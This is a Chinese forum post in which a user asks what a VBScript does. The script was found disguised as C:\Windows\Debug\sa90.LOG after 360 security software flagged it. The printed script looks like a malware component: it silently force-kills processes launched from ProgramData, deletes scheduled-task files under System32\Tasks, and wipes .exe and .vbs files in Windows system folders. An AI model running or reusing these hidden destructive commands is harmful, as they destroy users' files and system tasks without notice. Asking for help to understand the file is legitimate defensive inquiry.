[其他] 我登陆京东的时候360提示有可疑进程准备运行，sa90.LOG,是个vbs

本帖最后由再世情緣于 2020-1-12 16:31 编辑

DIM objShell
set objShell=wscript.createObject("wscript.shell")
strComputer = "." 
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2") 
Set colItems = objWMIService.ExecQuery( _
    "SELECT * FROM Win32_Process where CommandLine like ""%ProgramData%""",,48) 
For Each objItem in colItems
	a=Split(objItem.CommandLine,"\")
	'Wscript.Echo UBound(a)
	if UBound(a)=3 then
		processName = replace(a(3),"""","")
		Wscript.Echo processName
		if  instr(a(3),right(a(2),len(a(2))-1)) then
			cmd = "taskkill.exe /F /IM " &processName
			Wscript.Echo cmd
			cmd2 = "cmd.exe /c del /F /Q "&objItem.CommandLine	
			Wscript.Echo objItem.CommandLine
			iReturn=objShell.Run(cmd, 0, TRUE)
			iReturn=objShell.Run(cmd2, 0, TRUE)
		end if
	end if
Next

Dim Fso,MyFolder,Folders
Set Fso = CreateObject ("Scripting.FileSystemObject")
Set MyFolder = Fso.GetFolder("C:\Windows\System32\Tasks\Microsoft\Windows")
Set Folders = MyFolder.SubFolders
For Each Folder in Folders
    if InStr(Folder.name,"-")>0 then
		'Wscript.Echo "C:\Windows\System32\Tasks\Microsoft\Windows\"&Folder.name
		cmd= "cmd.exe /c del /F /Q C:\Windows\System32\Tasks\Microsoft\Windows\"&Folder.name&"\*"
		iReturn=objShell.Run(cmd, 0, TRUE)
	end if 
Next

'Set ws=WScript.CreateObject("wscript.shell")
'w="C:\Windows\System32\Tasks\Microsoft\Windows"
'Set fso=WScript.CreateObject("scripting.filesystemobject")
'Set fs=fso.GetFolder(w)
'Set f=fs.SubFolders
'For Each uu In f
'	if instr(uu.Path,"-") then
'		cmd3 = "cmd.exe /c del /F /Q "&uu.Path&vbCrLf
'		iReturn=objShell.Run(cmd3, 0, TRUE)
'	end if
'Next


iReturn=objShell.Run("taskkill.exe /F /IM CmdRun*", 0, TRUE)
iReturn=objShell.Run("taskkill.exe /F /IM RCDLL*", 0, TRUE)
iReturn=objShell.Run("taskkill.exe /F /IM regcap*", 0, TRUE)
iReturn=objShell.Run("cmd.exe /c del /F /Q C:\Windows\System32\Tasks\Microsoft\Windows\WindowsBackup\Provisioning\*", 0, TRUE)
iReturn=objShell.Run("cmd.exe /c del /F /Q ""c:\Windows\System32\Tasks\Microsoft\Windows\Time Trigger Test Task""", 0, TRUE)
iReturn=objShell.Run("cmd.exe /c del /F /Q ""c:\Windows\System32\Tasks\Microsoft\Windows\programdata*""", 0, TRUE)
iReturn=objShell.Run("cmd.exe /c del /F /Q c:\Windows\Media\*.exe", 0, TRUE)
iReturn=objShell.Run("cmd.exe /c del /F /Q c:\Windows\AppPatch\*.vbs", 0, TRUE)
Set objShell=NoThing
复制代码

我登陆京东的时候，360弹出来的，是否要拦截，我点了拦截，路径是 C:\Windows\Debug\sa90.LOG，我找到文件，用notepad打开之后是这段代码
这段代码是啥意思啊

最后一段是结束进程删除文件的，我知道，前面的看不懂

返回列表

[新手上路]批处理新手入门导读	[视频教程]批处理基础视频教程	[视频教程]VBS基础视频教程	[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动	[批处理精品]CMD命令50条不能说的秘密	[在线下载]第三方命令行工具	[在线帮助]VBScript / JScript 在线参考

[其他] 我登陆京东的时候360提示有可疑进程准备运行，sa90.LOG,是个vbs

[收藏此主题] [关注此主题的新回复]

[通过 QQ、MSN 分享给朋友]